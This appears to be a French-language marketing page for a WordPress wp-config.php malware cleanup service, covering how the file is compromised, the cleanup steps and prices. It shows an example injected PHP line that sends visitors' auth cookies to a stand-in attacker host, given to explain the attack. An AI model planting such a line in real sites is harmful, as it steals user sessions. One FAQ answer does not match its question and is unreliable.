Comment wp-config.php a-t-il été modifié ?

Soit via une faille d’extension permettant l’écriture de fichiers, soit avec des identifiants SFTP/SSH volés. Le rapport précise lequel.

Dois-je vous donner des données clients réelles ?

Oui. C’est inclus dans chaque nettoyage wp-config. Toute session créée avant la rotation est automatiquement invalidée.

L’attaquant peut-il encore lire mes données après le nettoyage ?

Pas si l’injection n’a touché que wp-config — on retire leur code, on tourne les clés et on vérifie la base pour toute persistance liée. S’ils ont pris un dump de la base pendant que l’injection tournait, ces données sont perdues ; on vous le dit dans le rapport.

Devrais-je plutôt restaurer depuis une sauvegarde ?

Sometimes. If you have a clean pre-incident backup, restoring is fast. I can still do the forensic review and identify the entry vector so the same thing doesn’t happen to the restored site.

// PHARMA HACK · WORDPRESS · NETTOYÉ

wp-config.php malware cleanup.

wp-config.php s’exécute à chaque chargement de page WordPress, et c’est pour ça que les attaquants l’adorent. On retire l’injection, on tourne les clés et on vous dit à quoi l’attaquant avait accès. Forfait 279 $.

Démarrer un nettoyage → Comment wp-config.php est altéré

§ 01 — MÉCANISME

wp-config.php est le pire endroit pour qu’un attaquant plante du code.

wp-config.php se charge à chaque requête WordPress, avant même que WordPress ne puisse filtrer quoi que ce soit. Un attaquant qui modifie ce fichier peut exécuter du code à chaque page, capter chaque connexion, ou ajouter des admins cachés qui n’apparaissent pas dans le tableau de bord.

Dès que wp-config.php a été touché, vos salts, le mot de passe de la base et les clés d’authentification doivent être considérés comme compromis. On tourne tout dans le cadre du nettoyage, pas en option payante.

// wp-config.php — schéma d’injection courant

01 02 // Legitimate wp-config starts with constants.
03 define('DB_NAME', 'wp_database');
04
05 // Injected — sends auth cookies to attacker on every request:
06 @file_get_contents("http://evil.example/c?d=" . $_COOKIE);

§ 02 — CE QUE NOUS SUPPRIMONS

Chaque ligne, chaque clé, chaque compte.

[ TRIAGE DES PLUGINS ]

wp-config.php comparé ligne par ligne à une base saine. Chaque ligne non standard est examinée.
[ WP-CONFIG ]

Code injecté retiré. Lignes include/require parasites pointant vers des fichiers inconnus — auditées et supprimées.
[ CLÉS ]

AUTH_KEY, SECURE_AUTH_KEY, LOGGED_IN_KEY, NONCE_KEY et leurs salts tournés. Toutes les sessions invalidées.
[ BASE DE DONNÉES ]

Utilisateurs admin cachés supprimés. Charges autoloaded de wp_options auditées pour toute persistance liée.
[ DURCISSEMENT ]

Permissions de wp-config.php resserrées. Règles .htaccess et Nginx ajoutées pour interdire l’accès direct.
[ RAPPORT ]

Rapport médico-légal en langage clair : à quoi l’attaquant avait accès, ce qui a été tourné, ce qu’il vous reste à faire.

§ TARIFS

Forfait $279. Une seule fois. Par site.

[ RESCUE ]

$279

FORFAIT · UNIQUE · PAR SITE

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage →

[ SHIELD ]

$29 / mo

PAR SITE · RÉSILIATION À TOUT MOMENT

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contact →